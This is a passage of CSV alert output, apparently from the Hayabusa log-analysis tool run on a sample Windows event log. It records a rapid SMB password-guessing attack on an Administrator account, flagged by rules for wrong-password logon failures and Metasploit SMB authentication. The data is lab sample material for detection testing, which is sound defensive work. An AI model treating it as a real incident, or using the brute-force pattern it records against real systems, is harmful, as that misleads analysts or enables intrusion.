Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KJmYytO30Icc6Rb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zro3jLjFXWZ2o8VL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Z2J8VYeuxd9fKcG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXMjOKLfMex7OmMv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgbm3YeoGxCa22Il : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7MEstBFjiWhVE18 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8Y2kDEiMZWf0znn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBAFVgPIOyCvtdRs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s3pFhUcspF6lzQXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39LFXXW715pQoADC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: in4ewyxouUnxQzCQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOtV8CLIU6Mcw2ty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8NJqimhGrg9uhTh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XEWLTOY9magV0h6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Di1MZsJx52Bi8E6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22MdB2QodynfibkF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qojej3YITXvXJ6Pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CLjbQ6timbdQoufd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aZgoAnGEFwXN88bQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZFWoL9XUMJdfNnY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x000TRnXfVtPAQSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNHWWHDOpXQyNdrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1irbPdOoUfvq1MXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dCflbKOMPJRXQHsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zuy6nD4EXeGzEy5e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xkig4u0LIS9v3HMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94RbUrUcMf6VhP8A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X9f7wCJ3wI9RmZTL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkVs1viGo4RxhFaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKMLt6t01vUDDq1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYSif8ADOkC8aInB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EpmraSe2sxFVupTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VPtfy3AxXpt9D3bx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRMOrE0Ba983q0Jv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQ0nkyTAeJt3dCpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2fdsRMU9SMm1KpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3kliEPBsbsYNI7yG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gEKFGsRvvlzulxR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M6oUbT8LvS7JNCq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E4dxHwRQVR7iBWa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VRygirU257VfFcR5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6H6i0wkjvWkU6cmp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W4Nh7bYfVvx30hVF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQEsO4GpVjO5xpRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9ZlpSBwq0tLAgzm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65Piip53B1AiSBqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bh7SfuheoykW7Aym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 